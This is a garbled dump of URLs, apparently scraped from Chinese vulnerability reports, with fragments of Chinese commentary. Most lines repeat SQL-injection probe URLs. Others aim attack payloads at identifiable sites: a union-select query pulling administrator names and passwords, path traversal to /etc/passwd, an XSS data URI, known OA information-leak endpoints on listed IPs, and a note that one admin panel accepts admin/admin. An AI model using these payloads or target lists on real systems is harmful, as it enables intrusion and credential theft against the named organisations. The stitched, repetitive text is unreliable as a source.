http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0-- http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1& http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version 
http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version 
http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version 
http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version 
http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://kbfsshop.com/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1%20and%20@@version http://**.**.**.**/priceMedicine/news/pricestanard.jsp?channelid=578&channelname=%D6%D0%D2%BD%BC%B0%C3%F1%D7%E5%D2%BD%D5%EF%C1%C6%C0%E0,如图所示: http://**.**.**.**:1723/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:1723/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:1723/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**:1723/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://**.**.**.**:1723/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://**.**.**.**:1723/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:1723/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:1723/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**:1723/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:1723/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**:1723/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://119.90.53.90/phpmyadmin http://**.**.**.**/data/xy%23!123.mdb http://**.**.**.**/new.asp?cataid=3%27 http://www.csairholiday.com/ http://www.csairholiday.com/?m=travel&c=community&a=travels_home https://211.151.33.43 http://lcx.cc/?i=4167 http://211.151.33.43:7070 http://**.**.**.**:8889/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8889/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:8889/yyoa/assess/js/initDataAssess.jsp 
http://**.**.**.**:8889/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://pushdx.dnion.com/login.do http://www.dnion.com/case.php www.class.cn http://www.class.cn http://**.**.**.**/manage/talent/cnResume.action http://**.**.**.**/manage/talent/cn/infoView.action?talent.id=543095 http://scms.wh.sdu.edu.cn/proj_login.action http://oa.elion.com.cn/ http://**.**.**.**/reimbursement/cmd.jsp jdbc:jtds:sqlserver**.**.**.**:1433/gt_gamc_test;characterEncoding=UTF-8 http://m.qfpay.com/wp-login.php coding:utf-8 http://**.**.**.**:8080/admin-console/ http://**.**.**.** http://**.**.**.**/download/detail-2.html http://**.**.**.**/passport/ http://**.**.**.**/passport/?type=login http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88 http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88 http://www.zhaoxiaoshuo.com/paihang.php?y=2008 http://www.bilibili.com/api_proxy?app=tag&action=/tags/archive_add)测试确认后端限制60个字符 http://career.ruc.edu.cn/news.asp?date=2015/10/08 http://**.**.**.**/ http://www.class.cn/assign_course/course_preview?course_id=104362 http://**.**.**.**/news_view.php?id=672&cid1=62 http://**.**.**.**/Article_txt.asp?channel=1&classid=0&id=2547 http://**.**.**.**/admin/login.asp http://**.**.**.**/bugs/wooyun-2015-0143446 http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/misweb/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/misweb/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**:8080/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/vod_view.php?id=251 http://**.**.**.**/houtai/ 
http://**.**.**.**/admin/ http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**/auth/login http://**.**.**.**/ http://chatmanage.gome.com.cn/ http://chatmanage.gome.com.cn/manage/img/20151014212808.jspx pass:023 http://mail.58ganji.com/ http://**.**.**.**/ReadNews.asp?NewsID=1042&AreaID=8&BigClassID=17&SpecialID=0 http://**.**.**.**/newslist.php?id=41 http://**.**.**.**/newslist.php?id=41 http://**.**.**.** https://beian.zzidc.com/main/checkMessageYzm https://beian.zzidc.com/main/goMobileResetPwd http://mysql.chinaiiss.com/setup/index.php http://mysql.chinaiiss.com//setup/index.php?page=config http://**.**.**.**/bugs/wooyun-2010-0137067 http://m.chinaz.com/ajax.php?action=ajaxdata&alias=index&jsoncallback=1&page=1 http://crm.tv.tcl.com/DRP/ http://**.**.**.**,利用代码如下 http://**.**.**.**/m1/login.do http://zb.glsc.com.cn/manager/ zb.glsc.com.cn/dlarea/dl_model.php?bid=122&bname=%E8%AF%BA%E5%9F%BA%E4%BA%9A&mname=6234&from=b&mid=1268 zb.glsc.com.cn/dlarea/dl_model.php?bid=122&bname=%E8%AF%BA%E5%9F%BA%E4%BA%9A&mname=6234&from=b&mid=1268* http://bqfood.ynet.com/cgi/news.php?id=529503 http://222.189.156.67:8089/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://222.189.156.67:8089/yyoa/checkWaitdo.jsp?userID=1 http://222.189.156.67:8089/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://222.189.156.67:8089/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://222.189.156.67:8089/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://222.189.156.67:8089/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgiSSdtIFhTUyIpPC9zY3JpcHQ+ http://gwtest.wanda.cn http://**.**.**.**/ http://sunny.dongfeng-nissan.com.cn 
http://nbadata.m.sohu.com/nba/data_rank.php?type=steals&types=p http://113.16.174.145:8808/system/login!login.action http://**.**.**.**/sbm_admin/login.aspx http://**.**.**.**/wooyun.txt http://**.**.**.**/index.php?m=content&c=search&catid=7&theme=3399&area=0&crowd=0&level=0&ticselect=0 http://**.**.**.**/news/showarticle.asp?id=148 http://**.**.**.**/LoginCheck.aspx http://**.**.**.**:888/LoginCheck.aspx http://**.**.**.**/sfoa-v5/LoginCheck.aspx http://**.**.**.**/Album/Pview.asp?AlbumOwer=qqqaj4&Albumid=21&Pic=1 http://wooyun.org/bugs/wooyun-2015-0137888 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/cms/zhmm.aspx http://**.**.**.**/cms/web_bgcx.aspx http://**.**.**.**/cms/Web_Wsyy.aspx http://**.**.**.**/cms/YHDL.aspx http://**.**.**.**/cms/YHZC.aspx http://58.60.191.91:88/ http://58.60.191.91:88/Admin/Upload.asp http://**.**.**.**:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8080/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**:8080/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://**.**.**.**:8080/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://**.**.**.**:8080/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:8080/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://lvyue.lvmama.com/ http://lvyue.lvmama.com:80/ http://m.haodai.com/daikuan/xindailist http://www.oa8000.com/cms/ https://www.exploit-db.com/exploits/37423/这个漏洞,百度后得到一个宽字节注入 http://www.oa8000.com/cms/uploads/soft/aaa/xx.php http://srm.eebbk.com:85/ http://srv.okii.com:8015/Login.aspx lvyou.baidu.com/notes/photo/getpicbyurlsformat=ajax&t=1444879192002 
http://lvyou.baidu.com/notes/photo/getpicbyurls?format=ajax&t=1444879192002 http://m.class.cn/user/register_ajax http://**.**.**.**/bugs/wooyun-2010-0136712。还以为是重复了。仔细看看原来不是重复的。同样的是Lang存在遍历,%00截断 http://**.**.**.**//sys/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:10000/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8082/portal-dev/manufacturerApp/manufacturerAppRigsterAction!loadManufacturerAppIndex.action存在命令执行漏洞 http://**.**.**.**/index.php?m=permanent.news_content&cid=3&ccid=12&id=258 http://**.**.**.**/bugs/wooyun-2014-061802 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://oa.yogi.com.cn/yyoa/assess/js/initDataAssess.jsp http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.yogi.com.cn/yyoa/common/SelectPerson/reloadData.jsp http://oa.yogi.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://zhelp.shikee.com/home/search?keyword=a http://**.**.**.**/coremail/ http://**.**.**.**/ http://**.**.**.**/vip_1.php http://test.yintong.com.cn/apidemo/API_DEMO/testSign.action http://test.yintong.com.cn/apidemo/API_DEMO/xx.jsp http://**.**.**.**/en/events.php?enddate=2015-10-14& http://**.**.**.**/en/events.php?enddate=2015-10-14& http://**.**.**.**/,底下有个后台地址,点进去,账号密码一致,都是admin,进后台如逛后花园: 
http://www.eoffice.ecnu.edu.cn/new_gonggao/model/mode_1.asp?ID=4025%20union%20select%201,admin_name,3,4,admin_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20administrator http://mail.huatechsec.com/webmail http://mail.huatechsec.com/webmail/sys.php https://github.com/LastLin/stone/blob/134072bfb9c0277894450de0ebca7bc1c1ede949/stone/webapp_admin/src/main/java/com/autohome/framework/base/mail/ManageConfig.java http://**.**.**.**/list?SPage=1&nt_id=9&KEYWORD=1 http://www.laoyuegou.com/media/video/renqi/top/dota2/type/hero?hero_name=1 http://www.laoyuegou.com/media/video/renqi/top/dota2/type/hero?hero_name=1 http://**.**.**.**/fzbzgzj/login.aspx http://www.ciscostation.com.cn:80/storiesview.j https://auth.dxy.cn/accounts/forget http://kuaiwen.iiyi.com/center/ http://ztc.120.net/admin/kuaiwen/doctor/ls_modify?uid=&status=wait http://ztc.120.net/admin/kuaiwen/doctor/ls_modify?uid=&status=wait http://sso.jrj.com.cn/sso/mobile/retrieveByEmail.jsp www.open.com.cn http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 
http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 
http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 
http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**//api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 